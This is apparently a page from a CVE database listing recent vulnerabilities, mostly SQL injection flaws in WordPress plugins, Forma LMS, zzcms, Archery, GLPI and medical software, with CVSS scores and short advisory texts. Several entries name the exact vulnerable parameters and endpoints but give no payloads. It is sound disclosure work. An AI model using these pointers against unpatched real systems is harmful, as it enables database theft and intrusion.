Total
14188 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2021-24651 | 1 Ays-pro | 1 Poll Maker | 2022-11-09 | 5.0 MEDIUM | 7.5 HIGH |
| The Poll Maker WordPress plugin before 3.4.2 allows unauthenticated users to perform SQL injection via the ays_finish_poll AJAX action. While the result is not disclosed in the response, it is possible to use a timing attack to exfiltrate data such as password hash. | |||||
| CVE-2021-24626 | 1 Chameleon Css Project | 1 Chameleon Css | 2022-11-09 | 6.5 MEDIUM | 8.8 HIGH |
| The Chameleon CSS WordPress plugin through 1.2 does not have any CSRF and capability checks in all its AJAX calls, allowing any authenticated user, such as subscriber to call them and perform unauthorised actions. One of AJAX call, remove_css, also does not sanitise or escape the css_id POST parameter before using it in a SQL statement, leading to a SQL Injection | |||||
| CVE-2021-24555 | 1 Roosty | 1 Diary-availability-calendar | 2022-11-09 | 6.5 MEDIUM | 8.8 HIGH |
| The daac_delete_booking_callback function, hooked to the daac_delete_booking AJAX action, takes the id POST parameter which is passed into the SQL statement without proper sanitisation, validation or escaping, leading to a SQL Injection issue. Furthermore, the ajax action is lacking any CSRF and capability check, making it available to any authenticated user. | |||||
| CVE-2022-27380 | 2 Debian, Mariadb | 2 Debian Linux, Mariadb | 2022-11-08 | 5.0 MEDIUM | 7.5 HIGH |
| An issue in the component my_decimal::operator= of MariaDB Server v10.6.3 and below was discovered to allow attackers to cause a Denial of Service (DoS) via specially crafted SQL statements. | |||||
| CVE-2022-41671 | 1 Schneider-electric | 2 Ecostruxure Operator Terminal Expert, Pro-face Blue | 2022-11-08 | N/A | 7.8 HIGH |
| A CWE-89: Improper Neutralization of Special Elements used in SQL Command (‘SQL Injection’) vulnerability exists that allows adversaries with local user privileges to craft a malicious SQL query and execute as part of project migration which could result in execution of malicious code. Affected Products: EcoStruxure Operator Terminal Expert(V3.3 Hotfix 1 or prior), Pro-face BLUE(V3.3 Hotfix1 or prior). | |||||
| CVE-2022-38537 | 1 Archerydms | 1 Archery | 2022-11-08 | N/A | 9.8 CRITICAL |
| Archery v1.4.5 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_file, end_file, start_time, and stop_time parameters in the binlog2sql interface. | |||||
| CVE-2022-38541 | 1 Archerydms | 1 Archery | 2022-11-07 | N/A | 9.8 CRITICAL |
| Archery v1.8.3 to v1.8.5 was discovered to contain multiple SQL injection vulnerabilities via the start_time and stop_time parameters in the my2sql interface. | |||||
| CVE-2022-39323 | 1 Glpi-project | 1 Glpi | 2022-11-03 | N/A | 9.8 CRITICAL |
| GLPI stands for Gestionnaire Libre de Parc Informatique. GLPI is a Free Asset and IT Management Software package that provides ITIL Service Desk features, licenses tracking and software auditing. Time based attack using a SQL injection in api REST user_token. This issue has been patched, please upgrade to version 10.0.4. As a workaround, disable login with user_token on API Rest. | |||||
| CVE-2022-41680 | 1 Formalms | 1 Formalms | 2022-11-01 | N/A | 6.5 MEDIUM |
| Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'search[value] parameter in the appLms/ajax.server.php?r=mycertificate/getMyCertificates' function in order to dump the entire database. | |||||
| CVE-2022-42923 | 1 Formalms | 1 Formalms | 2022-11-01 | N/A | 8.8 HIGH |
| Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'id' parameter in the 'appCore/index.php?r=adm/mediagallery/delete' function in order to dump the entire database or delete all contents from the 'core_user_file' table. | |||||
| CVE-2018-9309 | 1 Zzcms | 1 Zzcms | 2022-11-01 | 5.0 MEDIUM | 9.8 CRITICAL |
| An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in a dl/dl_sendsms.php request. | |||||
| CVE-2018-8967 | 1 Zzcms | 1 Zzcms | 2022-11-01 | 7.5 HIGH | 9.8 CRITICAL |
| An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in an adv2.php?action=modify request. | |||||
| CVE-2022-42924 | 1 Formalms | 1 Formalms | 2022-11-01 | N/A | 6.5 MEDIUM |
| Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'dyn_filter' parameter in the 'appLms/ajax.adm_server.php?r=widget/userselector/getusertabledata' function in order to dump the entire database. | |||||
| CVE-2021-36898 | 1 Expresstech | 1 Quiz And Survey Master | 2022-10-31 | N/A | 7.2 HIGH |
| Auth. SQL Injection (SQLi) vulnerability in Quiz And Survey Master plugin <= 7.3.4 on WordPress. | |||||
| CVE-2022-1014 | 1 Labarta | 1 Wp Contacts Manager | 2022-10-29 | 7.5 HIGH | 9.8 CRITICAL |
| The WP Contacts Manager WordPress plugin through 2.2.4 fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to an SQL injection vulnerability. | |||||
| CVE-2021-43362 | 1 Meddata | 1 Hbys | 2022-10-29 | 7.5 HIGH | 9.8 CRITICAL |
| Due to improper sanitization MedData HBYS software suffers from a remote SQL injection vulnerability. An unauthenticated attacker with the web access is able to extract critical information from the system. | |||||
| CVE-2022-22524 | 1 Gavazziautomation | 3 Cpy Car Park Server, Uwp 3.0 Monitoring Gateway And Controller, Uwp 3.0 Monitoring Gateway And Controller Firmware | 2022-10-28 | N/A | 9.4 CRITICAL |
| In Carlo Gavazzi UWP3.0 in multiple versions and CPY Car Park Server in Version 2.8.3 an unauthenticated remote attacker could utilize a SQL-Injection vulnerability to gain full database access, modify users and stop services . | |||||
| CVE-2022-22389 | 4 Ibm, Linux, Microsoft and 1 more | 4 Db2, Linux Kernel, Windows and 1 more | 2022-10-28 | 4.0 MEDIUM | 6.5 MEDIUM |
| IBM Db2 for Linux, UNIX and Windows 9.7, 10.1, 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may terminate abnormally when executing specially crafted SQL statements by an authenticated user. IBM X-Force ID: 2219740. | |||||
| CVE-2022-28452 | 1 Redplanetcomputers | 1 Laundry Management System | 2022-10-28 | 7.5 HIGH | 9.8 CRITICAL |
| Red Planet Laundry Management System 1.0 is vulnerable to SQL Injection. | |||||
| CVE-2021-43361 | 1 Meddata | 1 Hbys | 2022-10-28 | 7.5 HIGH | 9.8 CRITICAL |
| Due to improper sanitization MedData HBYS software suffers from a remote SQL injection vulnerability. An unauthenticated attacker with the web access is able to extract critical information from the system. | |||||